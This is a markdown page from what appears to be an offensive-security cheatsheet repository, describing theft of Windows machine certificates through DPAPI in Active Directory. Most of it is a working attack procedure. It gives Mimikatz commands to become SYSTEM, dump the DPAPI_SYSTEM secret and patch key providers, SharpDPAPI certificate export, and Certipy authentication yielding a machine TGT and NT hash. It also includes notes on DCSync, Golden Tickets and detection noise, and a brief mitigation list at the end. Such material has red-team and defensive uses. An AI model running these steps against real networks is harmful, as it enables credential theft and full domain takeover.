daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

theft3-machine-certificate-theft-via-dpapi.md (3987B)


      1 ---
      2 title: "THEFT3 — Machine Certificate Theft via DPAPI"
      3 description: "Identical concept to THEFT2 — User Certificate Theft via DPAPI but for machine certificates. These are protected by the machine DPAPI masterkey, which is…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "privilege-escalation"]
      7 tools: ["Mimikatz", "Certipy", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT3 — Machine Certificate Theft via DPAPI.md"
     11 ---
     12 # THEFT3 — Machine Certificate Theft via DPAPI
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Credential Theft (local, machine DPAPI) |
     19 | **Difficulty** | Medium |
     20 | **Pre-requisites** | **SYSTEM** (or local admin) on the target host |
     21 | **Tools** | SharpDPAPI, Mimikatz, Certipy |
     22 | **OPSEC Noise** | Medium — requires SYSTEM, reads machine masterkeys |
     23 | **One-liner** | As SYSTEM, decrypt the **machine's** certificate private keys using the machine DPAPI masterkey, yielding a computer-account cert you can authenticate with. |
     24 
     25 ***
     26 
     27 ## What Is THEFT3?
     28 
     29 Identical concept to THEFT2 — User Certificate Theft via DPAPI but for **machine** certificates. These are protected by the **machine DPAPI masterkey**, which is itself protected by the `DPAPI_SYSTEM` LSA secret — so you need SYSTEM, not just a user session. A stolen machine cert lets you authenticate as `HOST$`, which is powerful: computer accounts can be Kerberoast/RBCD targets, and a DC's own cert enables DCSync-level access.
     30 
     31 **Key locations (machine):**
     32 
     33 ```
     34 Private keys : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
     35                C:\ProgramData\Microsoft\Crypto\Keys\           (CNG)
     36 Masterkeys   : C:\ProgramData\Microsoft\Protect\S-1-5-18\
     37 Certificates : C:\ProgramData\Microsoft\SystemCertificates\My\
     38 ```
     39 
     40 ***
     41 
     42 ## Step 1 — Become SYSTEM & Grab the Machine Masterkey
     43 
     44 ```powershell
     45 mimikatz # privilege::debug
     46 mimikatz # token::elevate                       # to SYSTEM
     47 mimikatz # lsadump::secrets                      # reveals DPAPI_SYSTEM secret
     48 mimikatz # dpapi::masterkey /in:"C:\ProgramData\Microsoft\Protect\S-1-5-18\<GUID>" /system
     49 ```
     50 
     51 ***
     52 
     53 ## Step 2 — Export Machine Certificates
     54 
     55 ```powershell
     56 # SharpDPAPI — /machine flag targets the SYSTEM store & machine masterkeys
     57 SharpDPAPI.exe certificates /machine
     58 
     59 # Mimikatz — export from local machine store (patch providers if non-exportable)
     60 mimikatz # crypto::certificates /systemstore:local_machine /export
     61 mimikatz # crypto::cng
     62 mimikatz # crypto::certificates /systemstore:local_machine /export
     63 ```
     64 
     65 ***
     66 
     67 ## Step 3 — Authenticate as the Machine Account
     68 
     69 ```bash
     70 certipy-ad cert -export -pfx machine.pfx -password '' -out clean.pfx
     71 certipy-ad auth -pfx clean.pfx -dc-ip $TARGET
     72 #   -> HOST$ TGT + machine NT hash
     73 ```
     74 
     75 > [!warning] Stealing a DC's certificate = domain compromise
     76 > If the host is a Domain Controller, its machine cert authenticates as `DC01$`, which has replication rights. From that TGT you can DCSync `krbtgt` and forge a Golden Ticket. Treat DC cert theft as full domain takeover.
     77 
     78 ***
     79 
     80 ## OPSEC Considerations
     81 
     82 | Action | Artefact | Noise |
     83 | :-- | :-- | :-- |
     84 | `token::elevate` / `lsadump::secrets` | LSASS access, SYSTEM token | 🟡 Medium |
     85 | Reading MachineKeys | file access (if audited) | 🟢 Low |
     86 | `crypto::cng` provider patch | KeyIso tamper | 🔴 High |
     87 
     88 ***
     89 
     90 ## Mitigation
     91 
     92 - Back machine keys with a **TPM** (default for modern Windows) so the raw DPAPI blob is insufficient.
     93 - Restrict local admin/SYSTEM; deploy Credential Guard and LSASS protection.
     94 - Tier your DCs and treat any DC SYSTEM access as a domain-wide incident.
     95 
     96 ***
     97 
     98 ## See Also
     99 
    100 - _ADCS Attack Methodology Guide · THEFT2 — User Certificate Theft via DPAPI · PERSIST2 — Machine Account Persistence via Certificates
    101 - Sources: SpecterOps *Certified Pre-Owned*; [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)